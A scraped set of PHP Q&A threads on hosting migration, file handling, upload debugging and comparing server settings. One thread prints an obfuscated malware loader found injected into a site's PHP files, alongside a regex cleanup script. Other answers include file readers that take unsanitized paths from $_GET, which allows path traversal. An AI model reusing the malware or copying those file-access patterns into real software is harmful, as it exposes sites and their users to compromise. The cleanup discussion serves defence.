PHP errors when changing hosts - php

I've recently inherited a website written in PHP and given the responsibility to move it from the current host to our own internal web servers.
I succesfully copied the files and i can browse the site on our webserver (IIS7) however some, not all, of the PHP scripts do not appear to execute properly.
For example, the following code loads some text content from a database and displays fine on the existing server,
<?php
$sql = "select * from tblsubpages where PageID = 1 " ;
$page_Result=mysql_query($sql);
while ( $page_Row = mysql_fetch_array ( $page_Result))
{
?>
<?=str_replace('<blockquote>','',$page_Row['Details']); ?>
however on the new server all i get is the following output in the place where the text content should be.
','',$page_Row['Details']); ?>
The files are identical on both sites and i've verified they can both succesfull connect to the mySQL server.
Question - Any ideas where i can begin troubleshooting or what can be the cause ?


It might be a problem with php.ini's short_open_tag directive on your new host. Check if it is off and if so, try switching it on.


In the php.ini file set :
short_open_tag = On
or change
<?=
to
<?php


First things first.
Make sure you are using the same php
versions
Copy over your php.ini file.
It looks like your ini file has short tags disabled. Change <?= to <?php echo


If you don't want to turn on short_tags you could try to convert them:
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator(DIRECTORY)) as $file) {
if (!$file->isFile()) continue;
$tokens = token_get_all(file_get_contents($file));
$source = '';
foreach ($tokens as $token) {
if (is_string($token)) {
$source .= $token;
continue;
}
if ($token[0] == T_OPEN_TAG_WITH_ECHO) {
$token[1] = '<?php echo ';
}
$source .= $token[1];
}
file_put_contents($file, $source);
}
This iterates over the token of the source and replaces T_OPEN_TAG_WITH_ECHO by <?php echo.

Related

Perform Delete, Edit and search operation on a file using php

I have a task to do in which i have to list the directories with it's files which i did, but i don't understand how to delete file or edit specific file in the directories any help will be appreciated Thanks.
<?php
error_reporting(0);
if(isset($_GET['dir']))
{
// /$path = 'E:\xampp\\'.$_GET['dir'];
$path = $_GET['dir'];
}
else
{
$path = 'E:\xampp\\';
}
if(is_dir($path))
{
$arrDir = scandir($path);
echo "<ul>";
foreach ($arrDir as $key => $value)
{
echo "<a href='http://localhost/vishrut/FileUpload/filelist.php?
dir=".$path.'/'.$value."'>".$value.'</a><br>';
}
echo "</ul>";
}
else
{
echo "<textarea>";
echo file_get_contents($path);
echo "</textarea>"."<br>";
}
?>

There are lots of PHP's functions to handle files: https://www.php.net/manual/en/ref.filesystem.php
For your needs see these:
file_get_contents to read the entire file contents
file_put_contents to write the content in a file
unlink to delete a file
So, the steps to modify a file may be:
get the complete contents with file_get_contents:
$contents = file_get_contents($filePath);
apply your edits to the $contents content:
$newContents = ...
overwrite the file content:
file_put_contents($filePath, $newContents);
To delete a file is simple:
unlink($filePath);
It's important to note that your code is subjected to injection because you don't check the user data passed with $_GET.
If your script will be used only by you it's ok, instead you must check all user input: the first rule of Web programming is NEVER TRUST YOUR USERS! Also trusted users may write wrong characters in the url and that may have unexpected results (e.g. delete the wrong file!)
Read https://www.php.net/manual/en/mongodb.security.script_injection.php

open file on client stored on server

I want to open a server stored html report file on a client machine.
I want to bring back a list of all the saved reports in that folder (scandir).
This way the user can click on any of the crated reports to open them.
So id you click on a report to open it, you will need the location where the report can be opend from
This is my dilemma. Im not sure how to get a decent ip, port and folder location that the client can understand
Here bellow is what Ive been experimenting with.
Using this wont work obviously:
$path = $_SERVER['DOCUMENT_ROOT']."/reports/saved_reports/";
So I though I might try this instead.
$host= gethostname();
$ip = gethostbyname($host);
$ip = $ip.':'.$_SERVER['SERVER_PORT'];
$path = $ip."/reports/saved_reports/";
$files = scandir($path);
after the above code I loop through each file and generate a array with the name, date created and path. This is sent back to generate a list of reports in a table that the user can interact with. ( open, delete, edit)
But this fails aswell.
So im officially clueless on how to approach this.
PS. Im adding react.js as a tag, because that is my front-end and might be useful to know.

Your question may be partially answered here: https://stackoverflow.com/a/11970479/2781096
Get the file names from the specified path and hit curl or get_text() function again to save the files.
function get_text($filename) {
$fp_load = fopen("$filename", "rb");
if ( $fp_load ) {
while ( !feof($fp_load) ) {
$content .= fgets($fp_load, 8192);
}
fclose($fp_load);
return $content;
}
}
$matches = array();
// This will give you names of all the files available on the specified path.
preg_match_all("/(a href\=\")([^\?\"]*)(\")/i", get_text($ip."/reports/saved_reports/"), $matches);
foreach($matches[2] as $match) {
echo $match . '<br>';
// Again hit a cURL to download each of the reports.
}

Get list of reports:
<?php
$path = $_SERVER['DOCUMENT_ROOT']."/reports/saved_reports/";
$files = scandir($path);
foreach($files as $file){
if($file !== '.' && $file != '..'){
echo "<a href='show-report.php?name=".$file. "'>$file</a><br/>";
}
}
?>
and write second php file for showing html reports, which receives file name as GET param and echoes content of given html report.
show-report.php
<?php
$path = $_SERVER['DOCUMENT_ROOT']."/reports/saved_reports/";
if(isset($_GET['name'])){
$name = $_GET['name'];
echo file_get_contents($path.$name);
}

My website seems to be hacked? Obscure code on the first line of every PHP file?

I have the following in the first line of every PHP file in my server:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $hnzocslrhq = 'y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275x5c%x78257%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x782x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:porting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;PT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787f:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QI%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{67825-bubE{h%x5c%x7825)x5c%x78257>%x5c%x782f7&6|7**111127-K)ebf4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78c%x785c1^W%x5c%x7825c!>!%x5c%5+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!o)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%xsX%x5c%x7827u%x5c%x7825)7fmji%x57825bT-%x5c%x7825hW~%x5c%x7825pcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]4c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x78x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5osvufs!*!+A!>!{e%x5c%x785c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%15tzw>!#]y76]277]y72]265]y39]274]6~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%xI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D63]y76]277#<%x5c%x7825t2w>#]e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<C2178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]yy]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%y35]256]y76]72]y3d]51-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x7825c%x78256<^#zsfvr#%x5c%x785cq%hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%61"])))) { $GLOBALS["%x61%156%x75%1ufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmgx5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~4") && (!isset($GLOBALS["%x61%156%x75%156%x-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x74-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x*#k#)tutjyf%x5c%x7860%x5c%x787%x7824-%x5c%x7824<%x5c%x716,47R57,27R66,#%x5c%x782fq%x5c%x7825>x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%xc%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x786*CW&)7gj6<*doj%x5c%x78257-C>^#zsfvr#%x5c%x785cq%x57878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x7doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{*x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!5c%x7825r%x5c%x7878<~!!%x5c%c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pdC)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%Q&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%c%x7860QUUI&c_UOFHB%x5!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#5h>#]y31]278]y3e]81]K78:56985:6197g:7498}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;05c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osv%51%x29%73", NULL); }w**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]275-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#Px7825)!gj!|!*1?hmg%x5b%x5c%x7825ggg!>!#]y81]273]y76]258]y62q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepozcYufhA%x5c%x78272qj%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujptpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x223}!+!<+{e%x5c%x78225w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<p25)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnb!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56fpg)%x5c%x7825%x5c%x7824-c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj76]62]y3:]84#-!OVMM*<%x22%51%x29x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QD8e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x78)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x782fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]bz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78245c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]4ssfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-E72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)34%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!25)}.;%x5c%x7860UQPMSVDx7825)m%x5c%x7825):fmji%x5c%x7878:<##:2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7t)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sf56<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78x5c%x7825)j{hnpd!opju7824*<!%x5c%x7825kj:!>!#]y3d]51]#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%25:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%+;!>!}%x5c%x7827;!>>>!}_;gvc%x5ovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufsc%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x598]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#725)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c72]37y]672]48y]#>s%x5c%x7825<#462]47y]25%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x=]0#)2q%x5c%x7825l}Sx7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~25!**X)ufttj%x5c%x7822)gj!|!*]248]y83]256]y81]265]y72]254]y76]61]y33]68]y56%x61"]=1; function fjfgg($25:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x788%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]34]68]y33]65]y31]53]y6d]281]y43]7n){return chr(ord($n)-1);} #error_re81]273]y76]258]y6g]273]y76]271]y7d]252]y74]2c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%1412]18y]#>q%x5c%x7825<#76-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787if((function_exists("%x6f%142%x5f%163%x74%141%x72%16:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x7824%x5c%x7825)!gj}Z;h!opj%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|sqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91dovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%xx7825)Rd%x5c%x7825)Rb%x%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275d%x5c%x7825w6Z6<.4%x55c%x7825%x5c%x7824-%x5*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x7878X6<#o]o]Y%x5c%x78257;utp825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%45]43]321]464]284]364]6]234]342]58]24]31#-%udovg}{;#)tutjyf%x5c%x7860opjudx5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tw%x72%162%x61%171%x5f%155%x61%160%x28%42%x6824-tusqpt)%x5c%x7825z-#:#*%x5c%x782<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]56#<!%x5c%x7825ff2!>!bssI#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%c%x7825)!gj!<**2-4-bubE{h%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7666~6<&w6<%x5c%x787fw6z-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x78x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs25}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x55c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdob*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5mcnbs+yfeobz+sfwjidsb%x5c%x7860bj+ux5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jnpd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%xg]273]y76]271]y7d]252]y74]256#<!%%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tu8]y33]65]y31]55]y85]82]y!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-37]278]225]241]334]368]322]3]364]6]283]427]367825c*W%x5c%x7825eN+#Qi%x5y85]273]y6g]273]y76]271]y7d]252]y74]256]y39c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{5%x5c%x7827jsv%x5c%x78256<c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttff%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5w6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x78U%x5c%x7860MPT7-NBFSUT%x5c%x7860LD/(.*)/epreg_replaceglbldkfmmd'; $rpqfdfffwr = explode(chr((146-102)),'7170,52,2186,43,2050,35,6610,28,6771,36,252,54,6910,56,8215,42,1348,69,5043,55,2658,42,4577,57,4189,46,7648,21,5984,65,4459,66,498,44,1449,48,3179,53,564,40,796,32,2507,46,7731,33,1550,39,8751,43,7292,39,4525,52,10072,34,403,52,10011,61,4235,61,3892,23,1955,30,47,63,9729,26,2634,24,4382,45,9102,54,6851,59,1297,51,2607,27,2894,55,110,61,8293,65,5202,67,1887,68,5676,47,8606,22,7691,40,2411,40,8358,58,7937,60,5391,23,3005,59,6111,31,2830,64,7270,22,7906,31,6142,43,3232,64,2085,49,171,37,6989,38,4973,70,4110,59,9857,47,542,22,3915,63,3777,21,8547,32,7401,51,1810,56,5822,21,7452,65,5940,44,9191,60,5562,49,5329,62,5164,38,9251,70,4808,62,927,64,8106,51,5611,65,9156,35,858,69,1985,65,7517,23,8877,42,455,43,2949,34,3978,24,2983,22,9755,39,3434,43,2553,54,6537,29,8982,69,9973,38,1139,68,8794,42,7079,53,342,61,4296,33,4329,28,9935,38,7331,70,604,38,4169,20,671,56,1273,24,6334,41,7132,38,9794,63,5269,60,3064,38,2373,38,3835,57,2700,47,2318,30,6699,39,7027,52,3142,37,8416,43,6456,20,5098,66,4634,54,1417,32,9564,43,7600,48,3477,70,1631,27,0,47,8684,67,6638,61,6049,62,1043,31,8483,64,5414,38,4870,52,6375,40,6966,23,5452,67,7222,48,1760,50,6807,44,8459,24,4749,59,8060,46,7540,60,2229,51,8257,36,2280,38,7669,22,9607,61,2348,25,8579,27,991,52,9668,61,4357,25,4072,38,727,69,5843,32,1866,21,3671,60,6415,41,9538,26,642,29,6476,61,9434,59,9354,56,4922,51,8628,56,2134,52,8157,58,3317,57,3102,40,3547,60,6274,60,1658,55,5519,43,7764,43,7807,56,1589,42,5875,65,1713,47,9051,51,828,30,4688,61,9493,45,1074,65,7863,43,8919,63,1497,53,2802,28,2747,55,3607,64,5723,32,3374,60,208,44,306,36,6237,37,6185,52,2451,56,9904,31,1207,66,8836,41,3731,46,7997,63,5755,67,3798,37,9321,33,4002,70,6566,44,6738,33,9410,24,4427,32,3296,21'); $tsegwskutb=substr($hnzocslrhq,(33673-23567),(48-41)); if (!function_exists('kmcmhwubbu')) { function kmcmhwubbu($xsdezhfqaa, $ubtaczdqhk) { $qgqaoctdjy = NULL; for($jmqaqzyrxj=0;$jmqaqzyrxj<(sizeof($xsdezhfqaa)/2);$jmqaqzyrxj++) { $qgqaoctdjy .= substr($ubtaczdqhk, $xsdezhfqaa[($jmqaqzyrxj*2)],$xsdezhfqaa[($jmqaqzyrxj*2)+1]); } return $qgqaoctdjy; };} $vszierpgtn="\x20\57\x2a\40\x75\146\x6d\160\x6f\161\x78\165\x75\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\65\x36\55\x32\61\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x35\55\x35\60\x33\51\x29\54\x20\153\x6d\143\x6d\150\x77\165\x62\142\x75\50\x24\162\x70\161\x66\144\x66\146\x66\167\x72\54\x24\150\x6e\172\x6f\143\x73\154\x72\150\x71\51\x29\51\x3b\40\x2f\52\x20\144\x7a\155\x66\154\x71\153\x6f\142\x63\40\x2a\57\x20"; $vwfvdrtloh=substr($hnzocslrhq,(47118-37005),(78-66)); $vwfvdrtloh($tsegwskutb, $vszierpgtn, NULL); $vwfvdrtloh=$vszierpgtn; $vwfvdrtloh=(391-270); $hnzocslrhq=$vwfvdrtloh-1; ?><?php
I hope this didn't delete any of my code because I never backed my website up (it's hosted on a webhoster Arixe)
I'e looked this up on google, and it seems like wordpress had a similar problem. Problem is, this problem is only on my website, which isn't a wordpress site. The website is built on CodeIgniter.
I just checked my other codeigniter built websites and it seems as though this code got in all of them!

If you haven't a backup of your website you are screwed.
You should change your password and update your platform at any level (linux, php, framework and your website)

My problem was solved by: Changing all passwords FTP, Host,DB, Wordpress in same host.
After that follow this:
Create a file called removemalware.php at your base codeigniter folder, aside with index.php.
2.Put this content on.
$directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('c:/wamp/www/yoursitehere', RecursiveDirectoryIterator::SKIP_DOTS));
foreach($directory_iterator as $filename => $file)
{
if ($file->getExtension() !== "php") {
continue;
}
$content = file_get_contents($filename);
$reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
$count = 0;
$newContent = preg_replace ($reg, '', $content, -1, $count);
if($count === 1) {
echo $filename." with malware...<br>";
file_put_contents ($filename, $newContent);
echo $filename." rewrite without malware.<br>";
}
}
Edit your .htaccess to allow removemalware.php to be accessed.
(example: RewriteCond $1 !^(index\.php|assets|public|thumbs|sitemap\.xml|robots\.txt|removemalware\.php))
Access the file, be happy.

FileDrop.js & PHP resulting in empty $_FILES

JSFIDDLE
I'm using filedrop.js to create a file repository structure within my app. The above noted JSFIDDLE has all of the Javascript / jQuery / HTML and CSS code for this small module. While everything on the client end seems to be functioning properly (files can be DnD'd, progress bar acts correctly, console shows proper event triggers), the result on the server-side is always an empty $_FILES variable. My PHP (ajax.receiveFile.php) is as follows:
var_dump($_FILES);
ob_start();
$callback = &$_REQUEST['fd-callback'];
$job_id = &$_REQUEST['job_id'];
$subdir = &$_REQUEST['subdir'];
$j = loadJob($job_id);
$save_path = "D:\\JobFiles\\" . $j->gOrderNumber() . "\\" . $subdir . "\\";
if ( ($_FILES['fd-file']['size'] > 0) && is_uploaded_file($_FILES['fd-file']['tmp_name']) ) {
$name = $_FILES['fd-file']['name'];
if (move_uploaded_file($_FILES['fd-file']['tmp_name'], $save_path.$name)) {
$j->addAttachment($subdir,$name);
echo 'true';
} else {
echo 'false';
}
}
ob_end_flush();
FileDrop.js seems to be doing what it is supposed to do, as shown here:
I read here on SO that using the same element name over multiple input types of "file" can cause errors but I'm not sure that is the case here. I have double- and triple-checked the permissions on both the TEMP and TARGET upload folders, I have confirmed that all PHP variables are set as needed via visual inspection and PHPINFO(). The server config is PHP 5.4 on IIS7.
If anyone has any ideas on what else to look for, please contribute. Thanks!

This works for me:
file_put_contents('uploads/person/7.jpeg', fopen('php://input', 'r'));

comparing 2 phpinfo settings

I'd like to compare the settings I have on 2 different servers. Both are shared hosting so I don't think I have enough access to do it any other way but programmatically with phpinfo. So now that I have the 2 outputs, I'd like to compare them without examining them manually. Is there an automated way for this?
Also, as a side but related note, I think phpinfo is the output of php.ini. Is this correct?

From the PHP Manual on phpinfo():
Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment (if compiled as a module), the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License.
phpinfo() does more than just printing out php.ini settings.
If you want to process php.ini settings manually, you might want to check out ini_get_all() instead of phpinfo(). This returns an array of all configuration values.
You could transfer the output of ini_get_all() from server A to server B (for example by using var_export() to create PHP code to create the array, or serialize()), then use array_diff_assoc() to compare the settings.
export.php: (Server A)
<?php echo serialize(ini_get_all()); ?>
compare.php: (Server B)
<?php
function ini_flatten($config) {
$flat = array();
foreach ($config as $key => $info) {
$flat[$key] = $info['local_value'];
}
return $flat;
}
function ini_diff($config1, $config2) {
return array_diff_assoc(ini_flatten($config1), ini_flatten($config2));
}
$config1 = ini_get_all();
$export_script = 'http://server-a.example.com/export.php';
$config2 = unserialize(file_get_contents($export_script));
$diff = ini_diff($config1, $config2);
?>
<pre><?php print_r($diff) ?></pre>

Comparing two php.ini files easily using a parse_ini_file function
Example code snippet
$firstIni = parse_ini_file('/etc/php5/apache2/php.ini');
$secondIni = parse_ini_file('/etc/php5/apache2/php.ini.save');
$firstIniDiff = array_diff($firstIni, $secondIni);
$secondIniDiff = array_diff($secondIni, $firstIni);
if (count($firstIniDiff) > 0) {
echo '<h1>php.ini changes</h1>';
echo '<ol>';
foreach ($firstIniDiff as $key => $val) {
echo '<li> php.ini'.$key.': '.$val.' ----> php.ini.save :'.#$secondIniDiff[$key].'</li> ';
}
echo '</ol>';
}
